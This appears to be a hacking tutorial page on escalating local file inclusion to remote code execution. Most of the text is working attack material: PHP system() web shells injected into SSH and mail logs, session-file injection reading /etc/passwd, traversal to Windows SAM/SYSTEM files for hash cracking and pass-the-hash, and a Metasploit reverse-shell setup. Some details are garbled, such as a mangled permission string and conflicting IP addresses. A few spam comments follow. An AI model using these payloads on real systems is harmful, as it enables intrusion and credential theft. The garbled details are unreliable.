RCE with log poisoning Attack Methodologies
Some of the important log files are the following :-
http://example.com/index.php?page=/var/log/apache/access.log http://example.com/index.php?page=/var/log/apache/error.log http://example.com/index.php?page=/var/log/nginx/access.log http://example.com/index.php?page=/var/log/nginx/error.log http://example.com/index.php?page=/var/log/vsftpd.log http://example.com/index.php?page=/var/log/sshd.log http://example.com/index.php?page=/var/log/auth http://example.com/index.php?page=/var/log/mail http://example.com/index.php?page=/var/log/httpd/error_log http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log
It is important to get to know a great method to exploit when a web server essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.
The following steps explain how one can perform this process on Kali Linux:
Open the Kali Linux terminal and connect the target by using SSH service. The following command can be in great use then
ssh [email protected]
Check the permission of auth.log file beforehand using the following command
ls -l /var/log/auth.log
Most of the time the auth.log file appears to have the read-write permission. They should appear like the following
:-rw-r—r—r—syslog adm …...
We can now have access to the file and read all its logs through the following command
: tail -f /var/log/auth.log
We can walk through the logs and check the specific logs of the user named “mfsadmin”.
Now, let’s attempt to connect to the webserver using a counterfeit username. One can use the following command for an invalid login
ssh [email protected]
The permission should now be denied and shown clearly as follows
"Permission denied, please try again."
Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
"Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"
This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.
ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105
Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104
“Failed Password for invalid user <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2”
Let’s assume that you have previously created LFI and now we try to browse to it using the following link:
192.168.1.105/lfi/lfi.php
An error will appear looking like local file inclusion vulnerability.
The auth.log file should get included as a parameter now through the following URL inside the browser:
192.168.1.105/lfi/lfi.php?file=/var/log/auth.log
Note that a warning will display, with the following text:
“Warning cannot execute a blank command or log entry contains the ssh username with <?php system($_GET[‘c’]); ?> with ssh failed etc.”
Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.
Let’s now browse into
"192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps"
this will dump the data of auth.log besides executing a comment given through cmd
Let’s now browse into "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd".
This way, the results can display inside the window
Log Poisoning via Mail
As the logs tell us, the server is running Postfix and also has port 25 SMTP open, which was found from a basic Nmap scan. Now our goal is to inject PHP into the logs causing the PHP to render onto your web browser, once you refresh the page with the LFI vulnerability. Sending the phpinfo syntax is a great initial test, but our end goal will be to send this:
<?php echo system($_GET["cmd"]); ?>
So how can we get this PHP string into the postfix mail.log? By default, Postfix includes dates, email addresses, and some other basic data. Fire up emails, mutt or telnet to send the victim server mail. Also, using SMTP-user-enum on Kali may be a wise option to check for valid users – as long as VRFY isn’t disabled while postfix configs.
If you were thorough, you’ll notice the mail log includes the text of the mail subject. This is just perfect – now we can have PHP process any arbitrary code we mail it.
SMTP command flow via telnet may look something like this.
telnet 192.168.1.107 25 |
Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via the “RCPT TO” option. Since the mail.log file generates a log for every mail when we try to connect with the webserver. Taking advantage of this feature now I will send malicious PHP code as the fake user and it will get added automatically in the mail.log file as a new log.
MAIL FROM:<[email protected]>
RCPT TO:<?php system($_GET['c']); ?>
As our goal is to inject PHP code into the logs and this stage is called logfile poisoning and we can clearly see that details of mail.log, as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.
192.168.1.107/xyz/lfi.php?file=/var/log/mail.log&c=ifconfig |
In some cases, you can also send the email with the mail
command line.
mail -s "<?php system($_GET['cmd']);?>" [email protected] < /dev/null
LFI to RCE via PHP sessions
Check if the website uses PHP Session (PHPSESSID)
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Set the cookie to <?php system('cat /etc/passwd');?>
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
LFI to RCE via phpinfo()
PHPinfo() displays the content of any variables such as $_GET, $_POST and $_FILES.
By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
LFI to RCE via credentials files
This method requires high privileges inside the application in order to read the sensitive files.
Windows version
First extract sam
and system
files.
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
Then extract hashes from these files samdump2 SYSTEM SAM > hashes.txt
, and crack them with hashcat/john
or replay them using the Pass The Hash technique.
Execute following command inside Metasploit:
use exploit/multi/script/web_delivery msf exploit (web_delivery)>set target 1 msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp msf exploit (web_delivery)> set lhost 192.168.1.109 msf exploit (web_delivery)>set lport 8888 msf exploit (web_delivery)>exploit |
Wow, that’s what I was searching for, what a data!
existing here at this webpage, thanks admin of this site.
Yes! Finally someone writes about here.